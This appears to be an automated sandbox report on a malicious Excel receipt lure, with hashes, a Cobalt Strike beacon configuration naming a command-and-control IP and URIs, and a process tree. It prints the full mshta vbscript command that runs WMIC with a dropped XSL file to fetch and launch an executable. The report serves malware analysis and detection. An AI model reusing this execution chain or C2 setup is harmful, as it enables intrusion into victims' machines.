Analysis
-
max time kernel
148s -
max time network
185s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
06-07-2021 15:38
Static task
static1
Behavioral task
behavioral1
Sample
Reciept 0198478.xlsb
Resource
win7v20210410
General
-
Target
Reciept 0198478.xlsb
-
Size
67KB
-
MD5
16b275e48c1d27c448b4ed772206315c
-
SHA1
317988ea2f7fa8fa288850adce94bf2543bbd8d0
-
SHA256
d032d57e8f366c59979f536722b5cfbded08b94fc032da27220df46dfcd43208
-
SHA512
518b238dee5d8f69ab2f09a92f7daf12613358b21bbc38247e6e9faa45470eb450815d7a094dddc0dfc8db7b4698da27e76480258c9b7feb61f0c73e1cf04c50
Malware Config
Extracted
cobaltstrike
1359593325
http://94.198.40.11:80/visit.js
-
access_type
512
-
host
94.198.40.11,/visit.js
-
http_header1
AAAABwAAAAAAAAADAAAABgAAAAZDb29raWUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
-
http_header2
AAAACgAAACZDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQAAAAcAAAAAAAAABQAAAAJpZAAAAAcAAAABAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
-
http_method1
GET
-
http_method2
POST
-
polling_time
60000
-
port_number
80
-
sc_process32
%windir%\syswow64\rundll32.exe
-
sc_process64
%windir%\sysnative\rundll32.exe
-
state_machine
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCHFcV/jTWIWbMLGsg/xD3cCk0yHN+dWUBeSAZEdvXFEiawkFkWyJWyGyT0NbgSrwHmz+krYJY6l6YOoUNPWMNc6YpuQUYrBiilMX6rDkmmqUqem2tP6G4E6nBva8DOwNu671c8iFZeK4M8s6PPnUDuEuSHchHBLc5wV6Ew7BLO5QIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
unknown1
4096
-
unknown2
AAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
uri
/submit.php
-
user_agent
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
-
watermark
1359593325
Signatures
-
Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
-
Processes:
resource yara_rule C:\Windows\Temp\e15k9.exe cryptone -
Blocklisted process makes network request 1 IoCs
Processes:
WMIC.exeflow pid process 6 932 WMIC.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
e15k9.exepid process 1052 e15k9.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Office loads VBA resources, possible macro or embedded object present
-
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Processes:
EXCEL.EXEmshta.EXEdescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main mshta.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 304 EXCEL.EXE -
Suspicious use of AdjustPrivilegeToken 40 IoCs
Processes:
WMIC.exedescription pid process Token: SeIncreaseQuotaPrivilege 932 WMIC.exe Token: SeSecurityPrivilege 932 WMIC.exe Token: SeTakeOwnershipPrivilege 932 WMIC.exe Token: SeLoadDriverPrivilege 932 WMIC.exe Token: SeSystemProfilePrivilege 932 WMIC.exe Token: SeSystemtimePrivilege 932 WMIC.exe Token: SeProfSingleProcessPrivilege 932 WMIC.exe Token: SeIncBasePriorityPrivilege 932 WMIC.exe Token: SeCreatePagefilePrivilege 932 WMIC.exe Token: SeBackupPrivilege 932 WMIC.exe Token: SeRestorePrivilege 932 WMIC.exe Token: SeShutdownPrivilege 932 WMIC.exe Token: SeDebugPrivilege 932 WMIC.exe Token: SeSystemEnvironmentPrivilege 932 WMIC.exe Token: SeRemoteShutdownPrivilege 932 WMIC.exe Token: SeUndockPrivilege 932 WMIC.exe Token: SeManageVolumePrivilege 932 WMIC.exe Token: 33 932 WMIC.exe Token: 34 932 WMIC.exe Token: 35 932 WMIC.exe Token: SeIncreaseQuotaPrivilege 932 WMIC.exe Token: SeSecurityPrivilege 932 WMIC.exe Token: SeTakeOwnershipPrivilege 932 WMIC.exe Token: SeLoadDriverPrivilege 932 WMIC.exe Token: SeSystemProfilePrivilege 932 WMIC.exe Token: SeSystemtimePrivilege 932 WMIC.exe Token: SeProfSingleProcessPrivilege 932 WMIC.exe Token: SeIncBasePriorityPrivilege 932 WMIC.exe Token: SeCreatePagefilePrivilege 932 WMIC.exe Token: SeBackupPrivilege 932 WMIC.exe Token: SeRestorePrivilege 932 WMIC.exe Token: SeShutdownPrivilege 932 WMIC.exe Token: SeDebugPrivilege 932 WMIC.exe Token: SeSystemEnvironmentPrivilege 932 WMIC.exe Token: SeRemoteShutdownPrivilege 932 WMIC.exe Token: SeUndockPrivilege 932 WMIC.exe Token: SeManageVolumePrivilege 932 WMIC.exe Token: 33 932 WMIC.exe Token: 34 932 WMIC.exe Token: 35 932 WMIC.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
EXCEL.EXEpid process 304 EXCEL.EXE 304 EXCEL.EXE 304 EXCEL.EXE 304 EXCEL.EXE 304 EXCEL.EXE -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
taskeng.exemshta.EXEWMIC.exedescription pid process target process PID 1872 wrote to memory of 1652 1872 taskeng.exe mshta.EXE PID 1872 wrote to memory of 1652 1872 taskeng.exe mshta.EXE PID 1872 wrote to memory of 1652 1872 taskeng.exe mshta.EXE PID 1652 wrote to memory of 932 1652 mshta.EXE WMIC.exe PID 1652 wrote to memory of 932 1652 mshta.EXE WMIC.exe PID 1652 wrote to memory of 932 1652 mshta.EXE WMIC.exe PID 932 wrote to memory of 1052 932 WMIC.exe e15k9.exe PID 932 wrote to memory of 1052 932 WMIC.exe e15k9.exe PID 932 wrote to memory of 1052 932 WMIC.exe e15k9.exe PID 932 wrote to memory of 1052 932 WMIC.exe e15k9.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Reciept 0198478.xlsb"1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\taskeng.exetaskeng.exe {E9EE2BCF-C3B6-492F-9EFA-61190C2AE8AA} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.EXEC:\Windows\system32\mshta.EXE vbscript:Execute("set osh = CreateObject(""Wscript.Shell""):osh.Run(""wmic os get /format:"" & Chr(34) & osh.ExpandEnvironmentStrings(""C:\ProgramData"") & ""\\qDialogSeriesAxes.xsl"" & Chr(34)),0:close")2⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\wbem\WMIC.exe"C:\Windows\System32\wbem\WMIC.exe" os get /format:"C:\ProgramData\\qDialogSeriesAxes.xsl"3⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Temp\e15k9.exe"C:\Windows\Temp\e15k9.exe"4⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\qDialogSeriesAxes.xslMD5
ed9a97566e5179a4793dad89b79f3c8b
SHA13aba6229322c12118a7999b35387045159429078
SHA256c6ce5cf41a799c6c427a8facae15fa9ac40eb3562132189c72e1398178c74981
SHA51208f827a3bea007feae33e69f43a09cfcb08f0f636d1eab3d937203bad63d94cd9f99312f162cefb1217e115d5ae3985b6202f2b773212134c540e01fe2d071f1
-
C:\Windows\Temp\e15k9.exeMD5
9a2e1bb9ad6f1ccfeaa4c2c55637ae3b
SHA1d42d55cab8637f847efdc1a01bcd5bb2d4668b7d
SHA256b012145b80d5176d73ed67924be9b1290d7920f05bf436f37deca4799b6d88b6
SHA512c8233171f957979936ea517dcabb3732e54b1cc19e89853d198b48c36f9609d2d8d0a0e75267a63162bd7d40371d22fbc62084441eaaec4d8670a5c2d985d1a6
-
memory/304-60-0x00000000716F1000-0x00000000716F3000-memory.dmpFilesize
8KB
-
memory/304-61-0x000000005FFF0000-0x0000000060000000-memory.dmpFilesize
64KB
-
memory/304-59-0x000000002F911000-0x000000002F914000-memory.dmpFilesize
12KB
-
memory/932-63-0x0000000000000000-mapping.dmp
-
memory/1052-68-0x00000000002C0000-0x00000000002F3000-memory.dmpFilesize
204KB
-
memory/1052-65-0x0000000000000000-mapping.dmp
-
memory/1052-67-0x0000000075971000-0x0000000075973000-memory.dmpFilesize
8KB
-
memory/1052-69-0x0000000000220000-0x0000000000267000-memory.dmpFilesize
284KB
-
memory/1052-70-0x0000000000400000-0x0000000000453000-memory.dmpFilesize
332KB
-
memory/1052-71-0x0000000001D90000-0x0000000001DCD000-memory.dmpFilesize
244KB
-
memory/1652-62-0x0000000000000000-mapping.dmp